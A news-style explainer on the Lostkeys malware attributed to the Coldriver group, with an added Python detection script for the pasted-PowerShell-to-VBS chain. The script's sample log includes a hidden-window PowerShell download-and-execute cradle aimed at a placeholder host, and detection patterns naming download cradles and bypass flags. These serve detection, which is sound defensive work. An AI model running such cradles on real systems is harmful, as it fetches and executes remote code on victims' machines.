Lostkeys Malware: Google’s Threat Intelligence Group (GTIG) has uncovered a dangerous new malware named ‘Lostkeys’, linked to the notorious Russian hacker group Coldriver. This malware is designed to steal sensitive files and system information and is deployed through a highly deceptive phishing campaign.
Coldriver—also known by aliases like UNC4057, Star Blizzard, and Callisto—has a history of targeting NATO governments, NGOs, military organizations, journalists, and diplomats through phishing emails.
How Lostkeys Malware Works
Unlike basic phishing attempts, Coldriver uses a multi-layered attack strategy to lure victims:
- Phishing Emails: The group sends emails posing as reputable institutions, embedding malicious links.
- Fake CAPTCHA Page: Clicking the link opens a fake website that displays a counterfeit CAPTCHA to seem legitimate.
- Malicious Script: Once the CAPTCHA is completed, a PowerShell script is silently copied to the user’s clipboard.
- User Prompt: The user is then prompted to run the script manually.
- System Checks: The malware checks screen resolution and detects whether the system is running in a virtual machine using MD5 hash checks.
- Final Payload: A Visual Basic Script (VBS) is executed—this is the actual Lostkeys malware.
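The chain above leaves a recognisable trace in process-creation telemetry: a PowerShell process started from the Windows shell (the user pasting a clipboard command into a prompt), followed shortly afterwards by a script host running a VBS file from a user-writable location. The following detection sketch is an added example, not code from Google's report or from Coldriver's tooling; it runs over constructed log records whose pipe-delimited fields (timestamp, host, parent, image, command line) are an assumed layout, and the indicator lists and ten-minute correlation window are assumptions a real deployment would tune.

```python
"""
Detect the pasted-PowerShell -> VBS chain in process-creation records.
Added example; record format and thresholds are assumptions, not the
page's own data.
"""
import re
from datetime import datetime, timedelta

# Constructed records: ts|host|parent_image|image|command_line.
# WS-17 shows the full chain, WS-22 is a benign scheduled script,
# WS-31 is a built-in Windows VBS, WS-40 shows only the first stage
# (the base64 blob is a placeholder, not a real encoded command).
SAMPLE_LOG = """\
2025-04-02T09:14:03|WS-17|explorer.exe|powershell.exe|powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/c)"
2025-04-02T09:14:09|WS-17|powershell.exe|wscript.exe|wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\up.vbs
2025-04-02T09:20:11|WS-22|explorer.exe|powershell.exe|powershell -NoProfile -File C:\\Scripts\\backup.ps1
2025-04-02T10:01:40|WS-31|services.exe|cscript.exe|cscript.exe //nologo C:\\Windows\\System32\\slmgr.vbs /dlv
2025-04-02T10:05:00|WS-40|explorer.exe|powershell.exe|powershell -EncodedCommand UGxhY2Vob2xkZXI=
"""

# Download cradles and encoded-command switches commonly pasted by users.
CRADLE = re.compile(
    r"(?i)(?<![\w-])(iex|invoke-expression|irm|invoke-restmethod|iwr|"
    r"invoke-webrequest|downloadstring|net\.webclient|"
    r"-e(?:c|nc|ncodedcommand)?)(?![\w-])"
)
# Flags that hide the console or disable the execution policy.
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-(?:ep|executionpolicy)\s+bypass")
SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
WINDOW = timedelta(minutes=10)  # assumed correlation window


def parse(log_text):
    """Turn the pipe-delimited records into dicts with a parsed timestamp."""
    events = []
    for line in log_text.strip().splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "parent": parent.lower(), "image": image.lower(),
                       "cmdline": cmdline})
    return events


def stage1_reasons(ev):
    """Shell-launched PowerShell carrying a cradle, encoded command,
    hidden window or policy bypass; returns the matched indicators."""
    if ev["parent"] != "explorer.exe" or ev["image"] not in SHELLS:
        return []
    reasons = [m.group(0) for m in CRADLE.finditer(ev["cmdline"])]
    reasons += [m.group(0) for m in HIDDEN.finditer(ev["cmdline"])]
    return reasons


def is_stage2(ev):
    """Script host running a .vbs either spawned by PowerShell or
    located in a user-writable directory."""
    cmd = ev["cmdline"].lower()
    if ev["image"] not in SCRIPT_HOSTS or ".vbs" not in cmd:
        return False
    return ev["parent"] in SHELLS or any(p in cmd for p in USER_WRITABLE)


def analyze(log_text):
    """Raise one alert per stage-1 launch; escalate to 'high' when a
    VBS stage follows on the same host within WINDOW."""
    events = sorted(parse(log_text), key=lambda e: e["ts"])
    alerts = []
    for ev in events:
        reasons = stage1_reasons(ev)
        if not reasons:
            continue
        followups = [e for e in events
                     if e["host"] == ev["host"] and is_stage2(e)
                     and ev["ts"] <= e["ts"] <= ev["ts"] + WINDOW]
        alerts.append({"host": ev["host"], "ts": ev["ts"].isoformat(),
                       "severity": "high" if followups else "medium",
                       "indicators": reasons,
                       "vbs_followup": [e["cmdline"] for e in followups]})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a["severity"].upper(), a["host"], a["indicators"], a["vbs_followup"])
```

On the sample, WS-17 is rated high (cradle plus hidden-window flags, then a VBS from the user's Temp folder six seconds later), WS-40 is rated medium on the encoded command alone, and the scheduled backup script and the built-in slmgr.vbs produce nothing. The parent-process condition is what keeps the rule quiet: the same command lines run from a scheduler or an admin console are not the pattern this chain depends on.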
What Can Lostkeys Do?
Once activated, Lostkeys can:
- Steal files with specific extensions from targeted directories
- Send system information and running processes to the attacker
- Access emails and contacts—Coldriver’s primary targets
- In some cases, the malware also searches for sensitive documents
First Detected in January 2025
Google reports that the first instance of Lostkeys was detected in January 2025, with follow-up activity recorded in March and April. This suggests the malware is still active and evolving.
A Growing Threat from Russian Hackers
Coldriver is a well-known advanced persistent threat (APT) group. Its phishing tactics are becoming increasingly sophisticated, making it harder for users to distinguish fake content from real websites or communications. The introduction of Lostkeys marks a new level of threat, particularly for individuals and organizations holding sensitive data.
How to Stay Safe
- Never run scripts from unknown sources
- Verify links and email senders before clicking
- Use reliable antivirus and endpoint protection tools
- Keep your system updated to avoid vulnerability exploits
- Avoid downloading files from suspicious or unverified websites
Final Note: Lostkeys is a reminder that even one careless click can compromise an entire system. Cyber hygiene and vigilance are more important than ever in a world of evolving threats.